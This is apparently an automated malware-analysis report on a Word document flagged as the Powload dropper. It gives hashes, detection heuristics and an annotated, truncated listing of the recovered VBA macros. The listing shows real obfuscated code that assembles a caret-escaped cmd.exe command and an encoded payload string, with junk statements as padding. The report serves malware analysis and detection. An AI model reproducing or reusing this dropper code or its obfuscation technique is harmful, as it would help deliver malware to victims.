Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3ccb8a7e7e9341fc…

MALICIOUS

Office (OLE)

91.0 KB Created: 2018-08-29 21:58:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: d4e83a7746caff0ea41742b41c436cef SHA-1: a53be51d1c04671241c0f6307f7da6643e8a9b35 SHA-256: 3ccb8a7e7e9341fc1243d8a0940f625dd14f403f84b632cc298c00695fd8891d
202 Risk Score

Heuristics 6

  • ClamAV: Doc.Dropper.Powload-6666844-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Powload-6666844-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10027 bytes
SHA-256: 9351513d4ddfa2997148aee47603bb04a417190b44b923345c0f641c44731a03
Preview script
First 1,000 lines of the extracted script
' Module attribute header as recovered by olevba. These Attribute statements are
' module metadata, not executable code. VB_Base = "1Normal.ThisDocument" together
' with VB_PredeclaredId = True marks this as the document's ThisDocument class
' module, renamed "GwIipOcF".
Attribute VB_Name = "GwIipOcF"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' A second module, "FntjKBbv", begins here: the decoded source of several VBA
' modules has been concatenated into the single macros.bas artifact.
Attribute VB_Name = "FntjKBbv"
' Returns one caret-obfuscated string assembled from nine fragments.
' The bare "Hour ..." statements interleaved with the assignments are padding:
' Hour's result is discarded, none of the operand names is assigned anywhere in
' the visible listing, and any runtime error is swallowed by the
' On Error Resume Next below. They do not affect the returned value.
Function rUOCPCqX()

' "On Error Resume Next" split across four lines with "_" continuations.
On _
Error _
Resume _
Next
Hour rlfMrn * HtrUa
   Hour wDMuA / ZVFRJ
   Hour hMFALc * BwXzJs
   Hour 42849 / IzmOR / MJwFAI / woJpHt
' Chr(3 + 4 + 1 + 4 + 22) is Chr(34), a double quote. Joined, this fragment reads
'   md /V:O/C"^s^et ^U^m^gK=
' i.e. the tail of a cmd.exe command line (the leading character is not built in
' this function; presumably supplied by the caller -- confirm in the full source).
' "^" is cmd's escape character and is dropped when the line is parsed, so the
' part after the quote reads: set UmgK=
qcrDWhjPVv = "md /V" + ":O/" + "C" + Chr(3 + 4 + 1 + 4 + 22) + "^s" + "^et ^U^" + "m^gK="
Hour CjWWbl / NFAcIC * 64863 / zzQwS
' The remaining fragments, with carets removed, form a long alphanumeric run
' that becomes the value of the environment variable above. It looks like an
' encoded payload, but that is not verifiable from this excerpt -- decode
' offline to confirm.
ssqNwSST = "=" + "^AAI^" + "A^A" + "CA^g" + "^AA" + "^I^AA" + "C^A^gAA" + "^I^A" + "^ACAgAA" + "I^AAC^A" + "^g^AA" + "^I"
Hour CFUVO / WGEKXZ / PiDZp / UKjdYa
   Hour 63550 * IbEMI
NTJBZY = "A^" + "ACA" + "gA^A^I^" + "A^ACA^9" + "B^" + "QfA" + "^sHAo" + "^B^w^Y" + "A^QHA^"
Hour 18225 * HjCVti / fWQWr * bvvLY
   Hour zjUEP * aDhMpM
haFKMjiFa = "hB^w^Y^" + "A^0^HA^" + "7^A^wa" + "^A" + "^E^G" + "A^lBg" + "cAIG^A" + "^" + "7^AwY"
Hour jrApW * XjVjaB * 96514 * sIHbmQ
   Hour 46669 * SKMobV
   Hour TBVRNs * ECDRV / iqdFDX * DajXsd
taXKAKfm = "A" + "QE" + "^At" + "B^" + "A^JAA" + "CA^t^"
Hour jcEOR * Wjtwjt
   Hour ziwWtX / TFifXQ
   Hour ZkbFWC / VzqHr
KjpDXh = "B^QZA" + "QH^A" + "JB^Q^LA" + "^U^G^" + "A" + "r" + "B^wbA^Y" + "^HAu^BQ" + "S" + "A" + "^s" + "^DAp"
Hour sHntJ * 76369 * 30357 * DmEdz
qouRnfBN = "^A^w" + "^Y" + "^AQE" + "^" + "A^tB^A^" + "J" + "^AAC^A" + "s" + "A^ge^" + "AcE^A" + "v^B" + "^A^J^A"
Hour diVju / StiCO / 55697 / 27401
VWfUtmrZNsO = "^gC^AlB" + "A" + "^b^A" + "^k" + "^G^AGB^" + "AZ^" + "A^EG^Av" + "^" + "B^A^b^" + "A^" + "4G" + "^A^3B^"
Hour 86560 / HZmKw
   Hour WKArw * LKJKX * SZVRb / dNpUio
vbWfGY = "wbA" + "QEAu^A^" + "w^SAU" + "^H^A^" + "B" + "^BAJA^s" + "^H^A^" + "5" + "^Bg" + "cA" + "Q^H" + "A^7^BQ^"
' Return value (VBA assigns it to the function name): all nine fragments
' concatenated in the order they were built.
rUOCPCqX = qcrDWhjPVv + ssqNwSST + NTJBZY + haFKMjiFa + taXKAKfm + KjpDXh + qouRnfBN + VWfUtmrZNsO + vbWfGY
   Hour 9863 * zBhdNd * fMCDl * lWAbG
   Hour oDjNd * KWjjz
   Hour jOuTA / fzvIpR
End Function
' Same construction as rUOCPCqX: eight caret-obfuscated fragments are built and
' joined in order, and the result is returned through the function name.
' The bare "Hour ..." statements are padding whose result is discarded; the
' operand names are never assigned in the visible listing and any error is
' swallowed by the On Error Resume Next below.
Function IYmEfFXUI()

' "On Error Resume Next" split across four lines with "_" continuations.
On _
Error _
Resume _
Next
Hour KsPYAj * tvnAi
   Hour ldTzIE * 17257
' Unlike rUOCPCqX there is no cmd.exe prefix here; with the carets removed these
' fragments are another alphanumeric run that presumably continues the encoded
' value started in rUOCPCqX -- confirm against the caller in the full source.
snEUKlpQ = "K^" + "AEEAC^B" + "QT^" + "AQ" + "C^A" + "^gA^g" + "b^Ak^GA" + "^" + "gA" + "ge" + "^Ac^E^" + "Av^BA^J" + "^A^gC"
Hour 56999 / lWIHY
   Hour SwFkDM * 73356
ziFrEihi = "^A^oB^" + "w" + "^Y^AEG" + "^A" + "l" + "B^gc^A" + "^8" + "^G^AmB^" + "wOAcC^" + "Al^B^" + "A^e^A^U"
Hour OqjKzY * RXRlPO
   Hour QJHfG * MDwVWZ
wsQNhU = "G^A^" + "uA" + "^wJ^A^s" + "C^A^3^" + "B^QW^A^" + "AF" + "A^k^" + "A^wKAc" + "C^Ac^B" + "w^J^" + "A"
Hour NNzjzl * tqizHK * 97531 / whoJVs
   Hour XZcMpF * nsHYz / 31874 * EEPGH
   Hour AnAHNh * IEfKJM
   Hour qUfuBZ * sFRGH
   Hour wwivV * vwdcLr
QPsUIXBV = "s" + "C^Aj^BQ" + "aA^w^" + "G^A^iB" + "Q^"
Hour 81347 * aQqFj / 54659 / qfjrq
   Hour zplSEw * qwQSbu
YtLHBzf = "d^" + "A^" + "A^HA" + "^6" + "Ag" + "d^A^4^" + "G" + "^A"
Hour psXbun / HwnQG / 37864 / doOklm
   Hour 20024 * dQFcVo / SJFjfD * BEnWl
   Hour dsinIf * DjwkPo
PoPfoLEwD = "l^BAJ^A" + "0DA^j^B" + "AR^A^0^" + "G^" + "A^k" + "^" + "A^w^O^A"
Hour 370 * AGLLST * jYXPY * 72009
EKhmljhcL = "cCA" + "yAQ" + "^OA^" + "UDAn^A" + "^A" + "^I^A0" + "^D" + "A"
Hour sPitH * sTuHUW * 8095 / FGOJk
   Hour 23561 / LZJDjI
   Hour uwwDvI * GTVOr * KzDfO / 33290
oFjIMipnbp = "^" + "g^AwdA" + "^kFAQ^B" + "A^" + "J" + "^A^sD" + "A"
' Return value: the eight fragments concatenated in build order.
IYmEfFXUI = snEUKlpQ + ziFrEihi + wsQNhU + QPsUIXBV + YtLHBzf + PoPfoLEwD + EKhmljhcL + oFjIMipnbp
   Hour PHzHEE / 70293
End Function
Function acoTL()

On _
Error _
Resume _
Next
Hour auDlaq * YTDzct
   Hour 7291 * 58195 / 58589 * bsjvuq
   Hour 69022 / PNXZAO
   Hour 4953 * qPRUU * aGYUq / TShoE
   Hour wVPYi * BzbdiA / 37329 * Dlzqi
HupBZO = "^p^A^w" + "JAA^" + "E^A" + "n^A^" + "AK^AQ^H" + "A^pB^A" + "b^" + "AAH^" + "ATBgL"
Hour 16815 / hhwZA
   Hour rkzlP * DksiZ
   Hour 4998 / 34157 * JDGUA / BlHVXi
BYCjaqjfv = "^AcC^A" + "^" + "G^BA^U" + "^AkH^Ar" + "B" + "QNA" + "wG"
Hour 53427 * MwiTX
   Hour 99133 / pzpQra
   Hour 74753 / auju
... (truncated)